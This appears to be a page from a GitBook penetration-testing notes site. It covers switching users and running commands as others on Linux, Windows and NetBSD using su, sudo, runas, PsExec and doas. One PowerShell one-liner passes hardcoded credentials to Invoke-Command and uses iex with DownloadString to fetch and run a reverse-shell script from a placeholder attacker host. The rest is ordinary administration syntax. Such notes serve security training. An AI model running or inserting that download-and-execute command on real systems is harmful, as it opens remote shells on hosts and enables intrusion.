Hacking Notes
  • What is this?
  • Reconnaissance 🗣
    • Information Gathering 🗣
  • Enumeration 🎯
    • Host Discovery 🛎
    • DNS Enumeration
    • OS Discovery 🖥
    • Port Scanning 📟
    • WAF Evasion
  • Web 📱
    • Unrestricted File Upload
    • Templates Injections ✖️
    • File Inclusion
    • Login Panes
    • SQL Injection
    • NoSQL Injection
    • OAuth 2.0 Bypass
  • Privilege Escalation
    • Linux Privesc
    • Windows Privesc
    • Run Commands AS
  • Post Explotation 💀
    • Port Forwarding and Tunneling
    • Transfering Files 📤
    • Reverse Shell 🔙
    • Crypto 101 👁
    • AV Evasion
    • Bypass UAC
    • Get Credentials
  • Services
    • PORT 21/tcp - FTP
    • PORT 25/tcp - SMTP
    • PORT 53/tcp/udp - DNS
    • Port 80,443/tcp - HTTP
    • Port 111/tcp - RPCBind
    • PORT 143,993/tcp - IMAP
    • PORT 139,445/tcp - SMB
    • PORT 161/udp - SNMP
    • PORT 1100/tcp - Java RMI
    • PORT 1433/tcp - Microsoft SQL Server
    • PORT 2049/tcp - NFS
    • PORT 3306/tcp MySQL
    • PORT 3389/tcp RDP
    • PyPI Server
  • Software
    • Tomcat
    • Jenkins
    • Drupal
    • Wordpress
  • Client-Side Attacks
    • Evil PDF
    • Microsoft Office Macros
  • Other
    • Hacking WiFI
      • WPA/WPA2 PSK
      • WPA/WPA2 PEAP (Enterprise)
      • WEP
    • Hacking with Powershell
    • Hacking AWS
  • Exploiting
    • Buffer Overflow
  • Active Directory
    • 🖥️AD Attacks
Powered by GitBook
On this page
  • Linux
  • Windows
  • Cmd
  • PsExec
  • Powershell
  • NetBSD

Was this helpful?

  1. Privilege Escalation

Run Commands AS

Some times we need to do a lateral or vertical movement between the same hosts only switching between local users, and we cant use any type of authenticated service such as SMB or SSH.

PreviousWindows PrivescNextPort Forwarding and Tunneling

Last updated 3 years ago

Was this helpful?

Linux

Linux has the easiest way to change between users using the su command.

su user

To change to root user (need to be in sudoer group)

sudo su -

Windows

Cmd

runas command gives us the oportunity in cmd the opportunity to run some commands as other users.

runas /user:username <program>
runas /user:domain\username <program>
runas /user:username@domain <program>

PsExec

is part of a growing kit of Sysinternals command-line tools that aid in the administration of local and remote systems named PsTools.

psexec.exe /accepteula
psexec.exe [\\COMPUTER] /u USER /p PASS cmd [args]

Powershell

$user='WORKGROUP\User'; 
$pass='passwd';
Invoke-Command -ScriptBlock { iex(New-Object Net.WebClient).DownloadString('http://<IP>:<PORT>/rev_shell.ps1') } -ComputerName BART -Credential (New-Object System.Management.Automation.PSCredential $user,(ConvertTo-SecureString $pass -AsPlainText -Force))

NetBSD

Similar like sudo

su user

Similar like sudoto change to rootuser:

doas -u USER sh
PsExec